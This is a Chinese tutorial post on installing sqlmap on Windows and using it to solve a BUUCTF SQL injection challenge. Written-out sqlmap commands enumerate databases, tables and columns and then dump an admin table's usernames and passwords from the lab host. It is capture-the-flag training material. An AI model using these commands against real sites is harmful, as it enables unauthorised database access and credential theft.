1.Windows体系下安装Sqlmap,必要安装python情况
python下载和安装,请参考大神的帖子:https://blog.csdn.net/Z_David_Z/article/details/113278533
2.sqlmap下载和安装
2.1.下载地点:http://sqlmap.org/,点击右边的zip file进行下载就好
2.2.下载完成后,解压到目录下,这是我的解压路径
2.2.解压完成后,添加情况变量
python的情况变量,python下载和安装请参考大神的引导
sqlmap添加情况变量
3.添加情况后,使用sqlmap命令操作
在sqlmap目录下打开cmd窗口,python 实行sqlmap.py 传入参数即可操作
操作命令
sqlmap下载:http://sqlmap.org/
解压sqlmap.zip包
sqlmapproject-sqlmap-1.8.8-0-g8b55644.zip
目录修改为sqlmap
2.在E:\softhome\sqlmap打开cmd命令窗口,输入命令
python sqlmap.py -u http://ad3b72b4-56a0-4aba-86f1-00c232c0d053.node5.buuoj.cn:81/backend/content_detail.php?id=2
操作命令
这些IP是BUUCTF的Basic 题目BUU SQL COURSE 1
BUUCTF地点:https://buuoj.cn/challenge
1.暴库
1.1.暴出所有库
python sqlmap.py -u http://b9ca0c42-fc98-4e2d-938a-c4b1d0813dfd.node5.buuoj.cn:81/backend/content_detail.php?id=1 --dbs
1.2.暴出当前地点库的表
python sqlmap.py -u http://b9ca0c42-fc98-4e2d-938a-c4b1d0813dfd.node5.buuoj.cn:81/backend/content_detail.php?id=1 --current-db
2.暴表
2.1.暴出所有数据表
python sqlmap.py -u http://b9ca0c42-fc98-4e2d-938a-c4b1d0813dfd.node5.buuoj.cn:81/backend/content_detail.php?id=1 -D news --tables
2.2.暴出指定数据表的字段
python sqlmap.py -u http://b9ca0c42-fc98-4e2d-938a-c4b1d0813dfd.node5.buuoj.cn:81/backend/content_detail.php?id=1 -D news -T admin --columns
2.3.暴出指定数据表的数据
python sqlmap.py -u http://b9ca0c42-fc98-4e2d-938a-c4b1d0813dfd.node5.buuoj.cn:81/backend/content_detail.php?id=1 -D news -T admin -C id,password,username --dump
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
